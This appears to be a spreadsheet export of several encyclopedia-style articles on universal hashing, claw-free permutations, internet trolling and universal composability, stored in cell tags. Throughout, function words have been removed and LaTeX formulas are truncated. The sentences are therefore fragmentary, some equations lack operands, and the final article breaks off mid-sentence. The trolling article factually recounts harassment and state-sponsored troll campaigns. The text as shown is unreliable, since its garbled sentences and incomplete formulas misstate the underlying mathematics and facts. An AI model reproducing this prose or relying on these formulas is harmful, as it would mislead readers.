o(n)} number collisions. observes many collisions, chooses another random {\displaystyle family repeats. universality guarantees number repetitions geometric random variable. constructions since computer data represented machine words, generally needs hash functions three types domains: machine words ("integers"); fixed-length vectors machine words; variable-length vectors ("strings"). hashing integers this section refers case hashing integers machines words; thus, operations like multiplication, addition, division, etc. cheap machine-level instructions. universe hashed {\displaystyle \{0,\dots ,|u|-1\}} original proposal carter wegman pick prime {\displaystyle p\geq |u|} define {\displaystyle h_{a,b}(x)=((ax+b)~{\bmod {~}}p)~{\bmod {~}}m} {\displaystyle a,b} randomly chosen integers modulo {\displaystyle {\displaystyle a\neq (this single iteration linear congruential generator.) {\displaystyle h=\{h_{a,b}\}} universal family, note {\displaystyle h(x)=h(y)} holds {\displaystyle ax+b\equiv ay+b+i\cdot m{\pmod {p}}} integer {\displaystyle {\displaystyle {\displaystyle (p-1)/m} since {\displaystyle p\geq |u|} {\displaystyle x\neq difference {\displaystyle x-y} nonzero inverse modulo {\displaystyle solving {\displaystyle yields {\displaystyle a\equiv i\cdot m\cdot (x-y)^{-1}{\pmod {p}}} .there {\displaystyle p-1} possible choices {\displaystyle (since {\displaystyle a=0} excluded) and, varying {\displaystyle allowed range, {\displaystyle \lfloor (p-1)/m\rfloor possible non-zero values right hand side. thus collision probability {\displaystyle \lfloor (p-1)/m\rfloor /(p-1)\leq ((p-1)/m)/(p-1)=1/m} .another {\displaystyle universal family notion statistical distance. write difference {\displaystyle h(x)-h(y)} {\displaystyle h(x)-h(y)\equiv (a(x-y)~{\bmod {~}}p){\pmod {m}}} .since {\displaystyle x-y} nonzero {\displaystyle uniformly distributed {\displaystyle \{1,\dots ,p-1\}} follows {\displaystyle a(x-y)} modulo {\displaystyle also uniformly distributed {\displaystyle \{1,\dots ,p-1\}} distribution {\displaystyle (h(x)-h(y))~{\bmod {~}}m} thus almost uniform, difference probability {\displaystyle 1/p} samples. result, statistical distance uniform family {\displaystyle o(m/p)} becomes negligible {\displaystyle p\gg family simpler hash functions {\displaystyle h_{a}(x)=(ax~{\bmod {~}}p)~{\bmod {~}}m} approximately universal: {\displaystyle \pr\{h_{a}(x)=h_{a}(y)\}\leq 2/m} {\displaystyle x\neq moreover, analysis nearly tight; carter wegman show {\displaystyle \pr\{h_{a}(1)=h_{a}(m+1)\}\geq 2/(m-1)} whenever {\displaystyle (p-1)~{\bmod {~}}m=1} avoiding modular arithmetic state hashing integers multiply-shift scheme described dietzfelbinger 1997. avoiding modular arithmetic, method much easier implement also runs significantly faster practice (usually least factor four). scheme assumes number bins power two, {\displaystyle m=2^{m}} {\displaystyle number bits machine word. then hash functions parametrised positive integers {\displaystyle a&lt;2^{w}} (that word {\displaystyle bits). evaluate {\displaystyle h_{a}(x)} multiply {\displaystyle {\displaystyle modulo {\displaystyle 2^{w}} keep high order {\displaystyle bits hash code. mathematical notation, {\displaystyle h_{a}(x)=(a\cdot x\,\,{\bmod {\,}}2^{w})\,\,\mathrm {div} \,\,2^{w-m}} implemented c-like programming languages {\displaystyle h_{a}(x)=} (size_t) (a*x) (w-m)this scheme satisfy uniform difference property {\displaystyle 2/m} -almost-universal; {\displaystyle x\neq {\displaystyle \pr\{h_{a}(x)=h_{a}(y)\}\leq 2/m} understand behavior hash function, notice that, {\displaystyle ax{\bmod {2}}^{w}} {\displaystyle ay{\bmod {2}}^{w}} highest-order bits, {\displaystyle a(x-y){\bmod {2}}^{w}} either highest order bits (depending whether {\displaystyle ax{\bmod {2}}^{w}} {\displaystyle ay{\bmod {2}}^{w}} larger). assume least significant {\displaystyle x-y} appears position {\displaystyle w-c} since {\displaystyle random integer integers inverses ring {\displaystyle z_{2^{w}}} follows {\displaystyle a(x-y){\bmod {2}}^{w}} uniformly distributed among {\displaystyle -bit integers least significant position {\displaystyle w-c} probability bits therefore {\displaystyle 2/2^{m}=2/m} hand, {\displaystyle c&lt;m} higher-order bits {\displaystyle a(x-y){\bmod {2}}^{w}} contain 1's, certain {\displaystyle h(x)\neq h(y)} finally, {\displaystyle c=m} {\displaystyle w-m} {\displaystyle a(x-y){\bmod {2}}^{w}} {\displaystyle h_{a}(x)=h_{a}(y)} bits {\displaystyle w-1,\ldots ,w-m+1} also happens probability {\displaystyle 1/2^{m-1}=2/m} this analysis tight, shown example {\displaystyle x=2^{w-m-2}} {\displaystyle y=3x} obtain truly 'universal' hash function, multiply-add-shift scheme {\displaystyle h_{a,b}(x)=((ax+b){\bmod {2}}^{w})\,\mathrm {div} \,2^{w-m}} implemented c-like programming languages {\displaystyle h_{a,b}(x)=} (size_t) (a*x+b) (w-m)where {\displaystyle random positive integer {\displaystyle a&lt;2^{w}} {\displaystyle random non-negative integer {\displaystyle b&lt;2^{w-m}} with choices {\displaystyle {\displaystyle {\displaystyle \pr\{h_{a,b}(x)=h_{a,b}(y)\}\leq 1/m} {\displaystyle x\not \equiv y{\pmod {2^{w}}}} this differs slightly importantly mistranslation english paper. hashing vectors this section concerned hashing fixed-length vector machine words. interpret input vector {\displaystyle {\bar {x}}=(x_{0},\dots ,x_{k-1})} {\displaystyle machine words (integers {\displaystyle bits each). {\displaystyle universal family uniform difference property, following family (dating back carter wegman) also uniform difference property (and hence universal): {\displaystyle h({\bar {x}})=\left(\sum _{i=0}^{k-1}h_{i}(x_{i})\right)\,{\bmod {~}}m} {\displaystyle h_{i}\in chosen independently random.if {\displaystyle power two, replace summation exclusive or.in practice, double-precision arithmetic available, instantiated multiply-shift hash family hash functions. initialize hash function vector {\displaystyle {\bar {a}}=(a_{0},\dots ,a_{k-1})} random integers {\displaystyle bits each. then number bins {\displaystyle m=2^{m}} {\displaystyle m\leq {\displaystyle h_{\bar {a}}({\bar {x}})=\left({\big (}\sum _{i=0}^{k-1}x_{i}\cdot a_{i}{\big )}~{\bmod {~}}2^{2w}\right)\,\,\mathrm {div} \,\,2^{2w-m}} possible halve number multiplications, roughly translates two-fold speed-up practice. initialize hash function vector {\displaystyle {\bar {a}}=(a_{0},\dots ,a_{k-1})} random integers {\displaystyle bits each. following hash family universal: {\displaystyle h_{\bar {a}}({\bar {x}})=\left({\big (}\sum _{i=0}^{\lceil k/2\rceil }(x_{2i}+a_{2i})\cdot (x_{2i+1}+a_{2i+1}){\big )}{\bmod {~}}2^{2w}\right)\,\,\mathrm {div} \,\,2^{2w-m}} double-precision operations available, interpret input vector half-words {\displaystyle w/2} -bit integers). algorithm {\displaystyle \lceil k/2\rceil multiplications, {\displaystyle number half-words vector. thus, algorithm runs "rate" multiplication word input. scheme also used hashing integers, interpreting bits vectors bytes. variant, vector technique known tabulation hashing provides practical alternative multiplication-based universal hashing schemes.strong universality high speed also possible. initialize hash function vector {\displaystyle {\bar {a}}=(a_{0},\dots ,a_{k})} random integers {\displaystyle bits. compute {\displaystyle h_{\bar {a}}({\bar {x}})^{\mathrm {strong} }=(a_{0}+\sum _{i=0}^{k-1}a_{i+1}x_{i}{\bmod {~}}2^{2w})\,\,\mathrm {div} \,\,2^{w}} .the result strongly universal {\displaystyle bits. experimentally, found cycle byte recent intel processors {\displaystyle w=32} hashing strings this refers hashing variable-sized vector machine words. length string bounded small number, best vector solution (conceptually padding vector zeros upper bound). space required maximal length string, time evaluate {\displaystyle h(s)} length {\displaystyle long zeroes forbidden string, zero-padding ignored evaluating hash function without affecting universality. note zeroes allowed string, might best append fictitious non-zero (e.g., character strings prior padding: ensure universality affected.now assume want hash {\displaystyle {\bar {x}}=(x_{0},\dots ,x_{\ell good bound {\displaystyle \ell known priori. universal family proposed treats string {\displaystyle coefficients polynomial modulo large prime. {\displaystyle x_{i}\in [u]} {\displaystyle p\geq \max\{u,m\}} prime define: {\displaystyle h_{a}({\bar {x}})=h_{\mathrm {int} }\left({\big (}\sum _{i=0}^{\ell }x_{i}\cdot a^{\ell -i}{\big )}{\bmod {~}}p\right)} {\displaystyle a\in [p]} uniformly random {\displaystyle h_{\mathrm {int} chosen randomly universal family mapping integer domain {\displaystyle [p]\mapsto [m]} .using properties modular arithmetic, computed without producing large numbers large strings follows: this rabin-karp rolling hash based linear congruential generator. above algorithm also known multiplicative hash function. practice, operator parameter avoided altogether simply allowing integer overflow equivalent (max-int-value many programming languages. below table shows values chosen initialize popular implementations. consider strings {\displaystyle {\bar {x}},{\bar {y}}} {\displaystyle \ell length longer one; analysis, shorter string conceptually padded zeros length {\displaystyle \ell collision applying {\displaystyle h_{\mathrm {int} implies {\displaystyle root polynomial coefficients {\displaystyle {\bar {x}}-{\bar {y}}} this polynomial {\displaystyle \ell roots modulo {\displaystyle collision probability {\displaystyle \ell probability collision random {\displaystyle h_{\mathrm {int} brings total collision probability {\displaystyle {\frac {1}{m}}+{\frac {\ell }{p}}} thus, prime {\displaystyle sufficiently large compared length strings hashed, family close universal statistical distance). other universal families hash functions used hash unknown-length strings fixed-length hash values include rabin fingerprint buzhash. avoiding modular arithmetic mitigate computational penalty modular arithmetic, three tricks used practice: chooses prime {\displaystyle close power two, mersenne prime. this allows arithmetic modulo {\displaystyle implemented without division (using faster operations like addition shifts). instance, modern architectures work {\displaystyle p=2^{61}-1} {\displaystyle x_{i}} 32-bit values. apply vector hashing blocks. instance, applies vector hashing 16-word block string, applies string hashing {\displaystyle \lceil k/16\rceil results. since slower string hashing applied substantially smaller vector, essentially fast vector hashing. chooses power-of-two divisor, allowing arithmetic modulo {\displaystyle 2^{w}} implemented without division (using faster operations masking). hash-function family takes approach. also k-independent hashing rolling hashing tabulation hashing min-wise independence universal one-way hash function low-discrepancy sequence perfect hashing references further reading knuth, donald ervin (1998). computer programming, vol. iii: sorting searching (3rd ed.). reading, mass; london: addison-wesley. isbn 0-201-89685-0. external links open data structures section 5.1.1 multiplicative hashing, morin</t>
  </si>
  <si>
    <t>Claw-free permutation</t>
  </si>
  <si>
    <t>mathematical computer science field cryptography, group three numbers (x,y,z) said claw permutations f0(x) f1(y) pair permutations said claw-free efficient algorithm computing claw. terminology claw free introduced goldwasser, micali, rivest 1984 paper, paradoxical solution signature problem" (and later complete journal paper), showed existence claw-free pairs trapdoor permutations implies existence digital signature schemes secure adaptive chosen-message attack. this construction later superseded construction digital signatures one-way trapdoor permutation. existence trapdoor permutations imply claw-free permutations exist; however, shown claw-free permutations exist factoring hard.the general notion claw-free permutation (not necessarily trapdoor) studied ivan damgård thesis application claw free functions cryptography (aarhus university, 1988), showed construct collision resistant hash functions claw-free permutations. notion claw-freeness closely related collision resistance hash functions. distinction claw-free permutations pairs functions hard create collision them, collision-resistant hash function single function hard find collision, i.e. function collision resistant hard find pair distinct values h(x) h(y).in hash function literature, commonly termed hash collision. hash function collisions difficult find said collision resistance. commitment given pair claw-free permutations straightforward create commitment scheme. commit sender chooses random calculates fb(x). since share domain (and range), statistically hidden receiver. open commitment, sender simply sends randomness receiver. sender bound opening commitment exactly equivalent finding claw. notice like construction collision resistant hash functions, construction require claw-free functions trapdoor. references further reading koshiba, takeshi (1996). "self-definable claw free functions".</t>
  </si>
  <si>
    <t>Internet troll</t>
  </si>
  <si>
    <t>internet slang, troll person posts inflammatory, insincere, digressive, extraneous, off-topic messages online community (such social media (twitter, facebook, instagram, etc.), newsgroup, forum, chat room, online video game, blog), intent provoking readers displaying emotional responses, manipulating others' perception. this typically troll's amusement, achieve specific result disrupting rival's online activities manipulating political process. even internet trolling also defined purposefully causing confusion harm users online, reason all.both noun verb forms "troll" associated internet discourse. media attention recent years equated trolling online harassment. courier-mail today show used "troll" mean person defaces internet tribute sites causing grief families". addition, depictions trolling included popular fictional works, television program newsroom, main character encounters harassing persons online tries infiltrate circles posting negative sexual comments. usage application term troll subjective. some readers characterize post trolling, others regard post legitimate contribution discussion, even controversial. more potent acts trolling blatant harassment off-topic banter. however, term internet troll also applied information warfare, hate speech, even political activism.controversial posts attract particularly strong response unfamiliar robust dialogue found online, rather physical, communities. experienced participants online forums know effective discourages trolls usually ignore them, responding tends encourage trolls continue disruptive posts hence often-seen warning: "please feed trolls". some believe incomplete advice effectively dealing trolls.the "trollface" image occasionally used indicate trolling internet culture.at times, word incorrectly used refer anyone controversial, differing, opinions. such usage goes ordinary meaning troll multiple ways. while psychologists determined psychopathological sadism, dark triad, dark tetrad personality traits common among internet trolls, observers claim trolls actually believe controversial views claim. farhad manjoo criticises view, noting person really trolling, intelligent critics would believe. origin etymology there competing theories "troll" first used internet slang, numerous unattested accounts usenet origins early 1980s before.the english noun "troll" standard sense ugly dwarf giant dates 1610 comes norse word "troll" meaning giant demon. word evokes trolls scandinavian folklore children's tales: antisocial, quarrelsome slow-witted creatures make life difficult travelers. trolls existed folklore fantasy literature centuries, online trolling around long internet existed. modern english usage, "trolling" describe fishing technique slowly dragging lure baited hook moving boat, whereas trawling describes generally commercial dragging fishing net. early non-internet slang "trolling" found military: 1972 term "trolling migs" documented navy pilots vietnam. referred "...decoys, mission drawing...fire away..."the contemporary term said appeared internet late 1980s, earliest known attestation according oxford english dictionary 1992.the context quote cited oxford english dictionary sets origin usenet early 1990s phrase "trolling newbies", used alt.folklore.urban (afu). commonly, meant relatively gentle inside joke veteran users, presenting questions topics overdone user would respond earnestly. example, veteran group might make post common misconception glass flows time. long-time readers would recognize poster's name know topic discussed repeatedly, subscribers group would realize, would thus respond. these types trolls served practice identify group insiders. this definition trolling, considerably narrower modern understanding term, considered positive contribution. notorious trollers, david mikkelson, went create urban folklore website snopes.com. late 1990s, alt.folklore.urban heavy traffic participation trolling sort frowned upon. others expanded term include practice playing seriously misinformed user, even newsgroups regular; often attempts humor rather provocation. noun troll usually referred trolling resulting discussion rather author, though posts punned dual meaning troll.the august 1997 strip webcomic kevin kell used word troll describe deliberately harass provoke internet users, similar modern sense word. languages chinese, trolling referred (chinese: lit. 'white eye'), straightforwardly explained "eyes without pupils", sense pupil used vision, white section cannot see, trolling involves blindly talking nonsense internet, total disregard sensitivities oblivious situation hand, akin eyes without pupils. alternative term (chinese: lit. 'white rot'), describes post completely nonsensical full folly made upset others, derives taiwanese slang term male genitalia, genitalia pale white color represents someone young, thus foolish. both terms originate taiwan, also used hong kong mainland china. another term, xiǎo (chinese: lit. 'little white') derogatory term used anonymous posting internet forums. another common term troll used mainland china (chinese: lit. 'sprayer, spurter').in japanese, tsuri (釣り) means "fishing" refers intentionally misleading posts whose purpose readers react, i.e. trolled. arashi (荒らし) means "laying waste" also used refer simple spamming. icelandic, þurs thurs) tröll troll) refer trolls, verbs þursa troll) þursast trolling, troll about) used.in korean, nak-si (낚시) means "fishing", refers internet trolling attempts, well purposely misleading post titles. person recognizes troll responded (or, case post title nak-si, read actual post) would often refer caught fish.in portuguese, commonly brazilian variant, troll (produced [ˈtɾɔw] brazil spelling pronunciation) usual term denote internet trolls (examples common derivate terms trollismo trollagem, "trolling", verb trollar, troll", entered popular use), older expression, used want avoid anglicisms slangs, complexo pombo enxadrista denote trolling behavior, pombos enxadristas (literally, "chessplayer pigeons") simply pombos terms used name trolls. terms explained adage popular saying: "arguing fulano (i.e., john doe) playing chess pigeon: defecates table, drops pieces simply flies off, claiming victory." thai, term krian (เกรียน) adopted address internet trolls. according royal institute thailand, term, literally refers closely cropped hairstyle worn schoolboys thailand, behaviour schoolboys usually gather play online games and, which, make annoying, disruptive, impolite, unreasonable expressions. term krian (ตบเกรียน; "slap cropped head") refers posting intellectual replies refute messages internet trolls cause perceived unintelligent. trolling, identity, anonymity early incidents trolling considered flaming, changed modern usage news media refer creation content targets another person. internet dictionary netlingo suggests four grades trolling: playtime trolling, tactical trolling, strategic trolling, domination trolling. relationship trolling flaming observed open-access forums california, series modem-linked computers. communitree begun 1978 closed 1982 accessed high school teenagers, becoming ground trashing abuse.some psychologists suggested flaming would caused deindividuation decreased self-evaluation: anonymity online postings would lead disinhibition amongst individuals. others suggested although flaming trolling often unpleasant, form normative behavior expresses social identity certain user group. according postmes, professor social organisational psychology universities exeter, england, groningen, netherlands, author individuality group, studied online behavior years, "trolls aspire violence, level trouble cause environment. they want kick off. they want promote antipathetic emotions disgust outrage, morbidly gives sense pleasure." someone brings something topic conversation order make person trolling.the practice trolling documented number academics early 1990s. this included steven johnson 1997 book interface culture, paper judith donath 1999. donath's paper outlines ambiguity identity disembodied "virtual community" usenet: physical world inherent unity self, body provides compelling convenient definition identity. norm body, identity virtual world different. composed information rather matter. donath provides concise overview identity deception games trade confusion physical epistemic community: trolling game identity deception, albeit played without consent players. troll attempts pass legitimate participant, sharing group's common interests concerns; newsgroup's forum's members, cognizant trolls identity deceptions, attempt distinguish real trolling postings, upon judging poster troll, make offending poster leave group. their success former depends well troll understand identity cues; success latter depends whether troll's enjoyment sufficiently diminished outweighed costs imposed group. whitney phillips observes this can't have nice things: mapping relationship between online trolling mainstream culture certain behaviors consistent among different types trolls. first, trolls subcultural variety self-identify troll. trolls also motivated known lulz, type unsympathetic, ambiguous laughter. final behavior insistent need anonymity. according phillips, anonymity allows trolls engage behaviors would replicate professional public settings. contrary, trolling often successful dependent target's lack anonymity. this included disclosing attachments, interests, vulnerability target cares real life. troll disrupt discussion newsgroup online forum, disseminate advice, damage feeling trust online community. group become sensitized trolling rate deception high many honestly naïve questions quickly rejected trolling. this quite off-putting user upon venturing first posting immediately bombarded angry accusations. even accusation unfounded, branded troll damaging one's online reputation.susan herring colleagues, "searching safety online: managing 'trolling' feminist forum", point difficulty inherent monitoring trolling maintaining freedom speech online communities: "harassment often arises spaces known freedom, lack censure, experimental nature". free speech lead tolerance trolling behavior, complicating members' efforts maintain open, supportive discussion area, especially sensitive topics race, gender, sexuality.cyberbullying laws vary state, trolling crime u.s. federal law. effort reduce uncivil behavior increasing accountability, many sites (e.g. reuters, facebook, gizmodo) require commenters register names e-mail addresses.trolling become form internet subculture developed rituals, rules, specialized language, dedicated spaces practice. appeal trolling primarily comes thrill long keep ruse going getting caught, exposed troll. when understood way, internet trolls less like vulgar, indiscriminate bullies, closer countercultural respondents called) overly sensitive public. main elements people troll interactions; trolling exists interactive communications internet users, influencing people's views objective emotional standpoints, lastly trolling target single individual, rather targets multiple members discussion. ways identify trolling include situation utilizing internet platform, offensive emotional content, intended reaction audience. corporate, political, special-interest sponsored trolls organizations countries utilize trolls manipulate public opinion part parcel astroturfing initiative. when trolling sponsored government, often called state-sponsored internet propaganda state-sponsored trolling. teams sponsored trolls sometimes referred sockpuppet armies.a 2016 study harvard political scientist gary king reported chinese government's cent party creates million pro-government social media posts year. report said government employees paid create pro-government posts around time national holidays avoid mass political protests. chinese government editorial state-funded global times defending censorship cent party trolls.a 2016 study nato strategic communications centre excellence hybrid warfare notes russo-ukrainian "demonstrated fake identities accounts used disseminate narratives social media, blogs, commentaries order manipulate, harass, deceive opponents.": nato report describes "wikipedia troll" uses type message design troll "emotional value" reliable "essentially true" information re-posts, presents wrong context, intending audience draw false conclusions." example, information, without context, wikipedia military history united states "becomes value-laden posted comment section article criticizing russia military actions interests ukraine. wikipedia troll 'tricky', terms actual text, information true, expressed gives completely different meaning readers.": unlike "classic trolls," wikipedia trolls "have emotional input, supply misinformation" "the dangerous" well "the effective trolling message designs.": even among people "emotionally immune aggressive messages" apolitical, "training critical thinking" needed, according nato report, "they relatively blind trust wikipedia sources able filter information comes platforms consider authoritative.": while russian-language hybrid trolls wikipedia troll message design promote anti-western sentiment comments, "mostly attack aggressively maintain emotional attachment issues covered articles.": discussions topics international sanctions ukrainian crisis "attracted aggressive trolling" became polarized, according nato report, "suggests subjects little potential re-educating audiences, emotional harm considered effective" pro-russian latvian-language trolls.: 2016 study fluoridation decision-making israel coined term "uncertainty bias" describe efforts power government, public health media aggressively advance agendas misrepresentation historical scientific fact. authors noted authorities tended overlook deny situations involve uncertainty making unscientific arguments disparaging comments order undermine opposing positions.the york times reported late october 2018 saudi arabia used online army twitter trolls harass late saudi dissident journalist jamal khashoggi critics saudi government.in october 2018, daily telegraph reported facebook "banned hundreds pages accounts says fraudulently flooding site partisan political content although came instead associated russia."while corporate networking site linkedin considered platform good taste professionalism, companies searching personal information promoting jobs real fake accounts posting political messages caught company guard. psychological characteristics researcher radford wrote phenomenon clowns history modern book clowns, found "bad clowns" evolved internet trolls. they dress traditional clowns but, amusement, tease exploit "human foibles" order speak "truth" gain reaction. like clowns make-up, internet trolls hide behind "anonymous accounts fake usernames". eyes, trickster performing nameless audience internet. studies conducted fields human–computer interaction cyberpsychology researchers corroborated radford's analysis phenomenon internet trolling form deception-serving entertainment correlations aggressive behaviour, katagelasticism, black humor, dark tetrad.trolling correlates positively sadism, trait psychopathy, machiavellianism (see dark triad). trolls take pleasure causing pain emotional suffering. their ability upset harm gives feeling power. psychological researches conducted fields personality psychology cyberpsychology report trolling behaviour qualifies anti-social behaviour strongly correlated sadistic personality disorder (spd). researches shown men, compared women, likely perpetrate trolling behaviour; gender differences online anti-social behaviour reflection gender stereotypes, agentic characteristics competitiveness dominance encouraged men. results corroborated gender (male) significant predictor trolling behaviour, alongside trait psychopathy sadism significant positive predictors. moreover, studies shown people enjoy trolling online tend also enjoy hurting people everyday life, therefore corroborating longstanding persistent pattern psychopathological sadism.a psychoanalytic sexologic study phenomenon internet trolling asserts anonymity increases incidence trolling behaviour, "the internet becoming medium invest anxieties thinking repercussions trolling affecting victims mentally incite sense guilt shame within them". concern troll concern troll false-flag pseudonym created user whose actual point view opposed troll claims hold. concern troll posts forums devoted declared point view attempts sway group's actions opinions claiming share goals, professed "concerns". goal fear, uncertainty, doubt within group often appealing outrage culture.for example, person wishes shame obese people, disguises impulse concern health overweight people, could considered concern troll.a verifiable example concern trolling occurred 2006 furtado, staffer then-congressman charles bass (r-n.h.), caught posing "concerned" supporter bass's opponent, democrat paul hodes, several liberal hampshire blogs, using pseudonyms "indienh" "indynh". "indynh" expressed concern democrats might wasting time money hodes, bass unbeatable. hodes eventually election.although term "concern troll" originated discussions online behavior, sees increasing describe similar offline behaviors. example, james wolcott vanity fair accused conservative york daily news columnist "concern troll" behavior efforts downplay mark foley scandal. wolcott links calls concern trolls saul alinsky calls "do-nothings", giving long quote alinsky do-nothings' method effects: these do-nothings profess commitment social change ideals justice, equality, opportunity, abstain discourage effective action change. they known brand, agree ends means'. hill published op-ed piece markos moulitsas liberal blog daily titled "dems: ignore 'concern trolls'". concern trolls question internet participants rather republicans offering public advice warnings democrats. author defines "concern trolling" "offering poisoned apple form advice political opponents that, taken, would harm recipient". troll sites york times article discussed troll activity 4chan encyclopedia dramatica, described online compendium troll humor troll lore". 4chan's board recognized "one internet's infamous active trolling hotspots". this site others often used base troll sites members normally post these trolls feed reactions victims "their agenda take delight causing trouble". places like reddit, 4chan, anonymous message boards prime real-estate online trolls. because there's tracing someone trolls post inflammatory content without repercussion.the online french group ligue accused organized harassment described troll group. media coverage controversy mainstream media outlets focused attention willingness internet users extreme lengths participate organized psychological harassment. australia february 2010, australian government became involved users defaced facebook tribute pages murdered children trinity bates elliott fletcher. australian communications minister stephen conroy decried attacks, committed mainly 4chan users, evidence need greater internet regulation, stating, "this argument internet mystical creation laws apply recipe anarchy wild west." facebook responded strongly urging administrators aware ways users remove inappropriate content facebook pages. 2012, daily telegraph started campaign take action "twitter trolls", abuse threaten users. several high-profile australians including charlotte dawson, robbie farah, laura dundovic, hadley victims phenomenon. india bollywood culture merged online communities late 1990s. consequently, internet trolls took advantage online space share political beliefs form trolling. example, maharashtra legislative assembly banned cattle slaughter india. provoking viral hashtag, "#beefban", trend amongst bollywood celebrities participating hashtag activism. 2015, salman khan participated internet activism regarding death sentence convict yakub memon. response, internet trolls harass bollywood celebrities voice right-winged opinions label traitors.newslaundry covered phenomenon "twitter trolling" "criticles". also characterizing twitter trolls weekly podcasts. united kingdom united kingdom, contributions made internet covered malicious communications 1988 well section communications 2003, jail sentences were, 2015, limited maximum months. october 2014, uk's justice secretary, chris grayling, said "internet trolls" would face years jail, measures criminal justice courts bill extend maximum sentence time limits bringing prosecutions. house lords select committee communications earlier recommended creating specific offence trolling. sending messages "grossly offensive indecent, obscene menacing character" offence whether received intended recipient not. several people imprisoned online harassment.trolls testimonial page georgia varley faced prosecution misunderstandings legal system wake term trolling popularized. october 2012, twenty-year-old jailed twelve weeks posting offensive jokes support group friends family april jones. united states march 2010, nbc's today segment detailing deaths three separate adolescent girls trolls' subsequent reactions deaths. shortly suicide high school student alexis pilkington, anonymous posters began performing organized psychological harassment across various message boards, referring pilkington "suicidal slut", posting graphic images facebook memorial page. segment also included exposé 2006 accident, eighteen-year-old fatally crashed father's highway pylon; trolls emailed grieving family leaked pictures mutilated corpse (see nikki catsouras photographs controversy).in 2007, media fooled trollers believing students consuming drug called jenkem, purportedly made human waste. user named pickwick totse posted pictures implying inhaling drug. major news corporations news channel reported story urged parents warn children drug. pickwick's pictures jenkem fake pictures actually feature human waste.in august 2012, subject trolling featured television series newsroom. character neal sampat encounters harassing individuals online, particularly looking 4chan, ends choosing post negative comments economics-related forum. attempt character infiltrate trolls' inner circles attracted debate media reviewers critiquing series.in february 2019, glenn greenwald wrote cybersecurity company knowledge "was caught weeks engaging massive scam create fictitious russian troll accounts facebook twitter order claim kremlin working defeat democratic senate nominee doug jones alabama. york times, exposing scam, quoted knowledge report boasted fabrications: orchestrated elaborate 'false flag' operation planted idea [roy] moore campaign amplified social media russian botnet.'"the 2020 democratic presidential candidate bernie sanders faced criticism behavior supporters online, deflected criticism, suggesting "russians" impersonating people claiming "bernie bro" supporters. twitter rejected sanders' suggestion russia could responsible reputation supporters. twitter spokesperson told cnbc: "using technology human review concert, proactively monitor twitter identify attempts platform manipulation mitigate them. standard, reasonable evidence state-backed information operations, we'll disclose following thorough investigation public archive largest kind industry." twitter suspended troll accounts posted content support michael bloomberg's presidential campaign.the 45th american president, donald trump, infamously used twitter denigrate political opponents spread misinformation earned moniker troll-in-chief. examples so-called gold membership trolling originated 2007 4chan boards, users posted fake images claiming offer upgraded 4chan account privileges; without "gold" account, could view certain content. this turned hoax designed fool board members, especially newcomers. copied became internet meme. cases, type troll used scam, notably facebook, fake facebook gold account upgrade proliferated order link users dubious websites content.the case zeran america online, inc. resulted primarily trolling. days oklahoma city bombing, anonymous users posted advertisements shirts celebrating bombing message boards, claiming shirts could obtained contacting kenneth zeran. posts listed zeran's address home phone number. zeran subsequently harassed.anti-scientology protests anonymous, commonly known project chanology, sometimes labeled "trolling" media wired, participants sometimes explicitly self-identify "trolls". neo-nazi website daily stormer orchestrates calls "troll army", encouraged trolling jewish luciana berger muslim activist mariam veiszadeh.in 2012, feminist anita sarkeesian started kickstarter campaign fund series youtube videos chronicling misogyny video games, received bomb threats speaking engagements, doxxing threats, rape threats unwanted starring role video game called beat anita sarkeesian.in 2018, russian government accused using sockpuppet armies consisting russians three russian companies including concord management alter outcome 2016 presidential election. with ensuring republican candidate, donald trump emerges victorious, sockpuppets allegedly pushed various criminal conspiracies, political rallies, disparaging comments trump major opponent, hillary clinton social media. initially, twitter facebook detected campaign reports suggest youtube, tumblr, google+, paypal, instagram used. donald trump denied plotting russian government propaganda russian government vehemently denied ties companies indicted. 2020, official discord server twitch channel u.s. army esports team became target trolling, people sent anti-u.s. army messages, memes, references crimes committed united states both. when team started banning users twitch channel trolling, accused violating first amendment united states constitution aclu knight first amendment institute columbia university. team since denied allegations.in 2021, salon columnist amanda marcotte, author troll nation: right became trump-worshipping monsters rat-f*cking liberals, america, truth itself (2018), described american far-right exclusively male organization proud boys, conservative pundit tucker carlson, podcast host rogan political commentators mastered "the trolling far-right recruitment strategy" preying upon american male insecurities, mediocrity, fragility. particular, regarding respective discriminatory comments transgender people, remarks "how crucial gender anxiety far-right recruitment". also references further reading walter, hourizi, moncur, pitsillides (2012). does internet change mourn? overview online. external links trolling advocacy safety trolling academy trolling advice, comment, training safe online free expert advice online safety background definitions usenet bulletin board abuse curlie netlingo definition academic debate searching safety online: managing "trolling" feminist forum respond internet rage malwebolence world trolling; york times magazine, mattathias schwartz; august 2008. internet trolls narcissists, psychopaths, sadists. jennifer golbeck psychology today. september 2014.</t>
  </si>
  <si>
    <t>Universal composability</t>
  </si>
  <si>
    <t>framework universal composability (uc) general-purpose model analysis cryptographic protocols. guarantees strong security properties. protocols remain secure even arbitrarily composed instances protocols. security defined sense protocol emulation. intuitively, protocol said emulate another one, environment (observer) distinguish executions. literally, protocol simulate protocol (without access code). notion security derived implication. assume protocol {\displaystyle p_{1}} secure definition. another protocol {\displaystyle p_{2}} emulates protocol {\displaystyle p_{1}} environment tells apart emulation execution protocol, emulated protocol {\displaystyle p_{2}} secure protocol {\displaystyle p_{1}} ideal functionality ideal functionality protocol trusted party communicate perfectly secure channels protocol participants computes desired protocol outcome. cryptographic protocol cannot make trusted party fulfils ideal functionality, protocol emulate behaviour trusted party honest users, view adversary learns attacking protocol indistinguishable computed simulator interacts ideal functionality. computation model computation model universal composability interactive turing machines activate writing other's communication tapes. interactive turing machine form multi-tape turing machine commonly used modelling computational aspects communication networks cryptography. communication model communication model bare framework basic. messages sending party handed adversary replace messages messages choice delivered receiving party. this also dolev-yao threat model. (based computational model parties modeled interactive turing machines) communication models additional properties confidentiality, authenticity, synchronization, anonymity modeled using ideal functionality. ideal communication functionality takes message input produces message output. (more limited) powers adversary {\displaystyle {\mathcal {a}}} modeled (limited) capacity adversary interact ideal functionality. ideal authenticated channel optimal ideal authenticated channel, ideal functionality {\displaystyle {\mathcal {f}}_{\mathsf {auth}}} takes message {\displaystyle party identity {\displaystyle input, outputs message together identity {\displaystyle recipient adversary. model power adversary delay asynchronous communication functionality {\displaystyle {\mathcal {f}}_{\mathsf {auth}}} first send message adversary {\displaystyle {\mathcal {a}}} would deliver message {\displaystyle m,p} receives command reply. ideal secure channel ideal secure channel, ideal functionality {\displaystyle {\mathcal {f}}_{\mathsf {sec}}} outputs identity sender recipient adversary, message revealed recipient. this models requirement secure channel authenticated private. model leakage information transferred, {\displaystyle {\mathcal {f}}_{\mathsf {sec}}} 